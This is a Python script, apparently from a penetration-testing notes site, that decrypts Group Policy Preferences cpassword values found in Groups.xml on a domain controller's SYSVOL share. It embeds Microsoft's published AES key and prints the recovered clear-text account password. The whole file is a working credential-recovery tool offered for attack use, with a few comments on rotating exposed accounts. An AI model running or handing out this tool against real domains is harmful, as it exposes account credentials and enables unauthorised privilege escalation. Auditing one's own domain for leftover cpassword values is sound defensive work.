decrypt_cpassword.py

The AES key used for decryption is public; Microsoft publishes it in the MS-GPPREF specification: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN

#!/usr/bin/python3
#---------------------------------------------------------------------
# Name        : decrypt_cpassword.py
# Description : Decrypt the cpassword attribute value embedded in
#               Groups.xml stored in the DC's SYSVOL share.
# Author       : Lisandre.com
# Prereq       : PyCryptodome (PyCrypto does not work with python 3.10.4)
#                sudo pip3 install pycryptodomex # BREAKS IMPACKET...
#---------------------------------------------------------------------
import sys
from base64 import b64decode

from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad

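### CHANGE THIS ###
# Fallback value, used only when no cpassword is given on the command line.
cpassword = "abc...def"

# AES-256 key and all-zero IV fixed by the MS-GPPREF specification (link in
# the file header).  Because both are published, a cpassword in SYSVOL gives
# no real confidentiality: treat the value as disclosed, rotate the account,
# and remove the preference item (MS14-025 stopped new values being stored).
key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8' \
      b'\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
iv = b'\x00' * 16


def _decode_cpassword(value: str) -> bytes:
    """Return the ciphertext bytes for one cpassword attribute value.

    Group Policy Preferences stores the Base64 text without its trailing
    '=' characters, so they are restored here.  ``(-len) % 4`` adds only
    what is missing; the previous ``4 - len % 4`` appended four '=' when the
    length was already a multiple of four.

    Raises:
        ValueError: if the text is not valid Base64 (``binascii.Error`` is a
            ``ValueError`` subclass) or the result is empty or not a whole
            number of AES blocks.
    """
    data = b64decode(value + '=' * (-len(value) % 4))
    if not data or len(data) % AES.block_size:
        raise ValueError(
            f"cpassword decodes to {len(data)} bytes, not a non-zero multiple "
            f"of {AES.block_size}"
        )
    return data


def decrypt_cpassword(value: str) -> str:
    """Decrypt one cpassword value and return the clear-text password.

    The plaintext is PKCS#7-padded UTF-16LE (MS-GPPREF), so the block
    padding is stripped and the text decoded as UTF-16LE.  The previous
    ``.decode('ascii').strip()`` kept the interleaved NUL and padding bytes;
    the result only looked right because a terminal does not render them.

    Raises:
        ValueError: on malformed Base64, a non-block-sized ciphertext, bad
            PKCS#7 padding (typically a corrupted value) or undecodable text.
    """
    ciphertext = _decode_cpassword(value)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = unpad(cipher.decrypt(ciphertext), AES.block_size)
    return plaintext.decode('utf-16-le')


def main(argv: list[str]) -> int:
    """Print the password for ``argv[1]``, or for the module-level
    ``cpassword`` when no argument is given.

    Returns:
        The process exit status: 0 on success, 1 when the value cannot be
        decoded (the reason is written to stderr).
    """
    value = argv[1] if len(argv) > 1 else cpassword
    try:
        print(decrypt_cpassword(value))
    except ValueError as err:
        print(f"decrypt_cpassword: {err}", file=sys.stderr)
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))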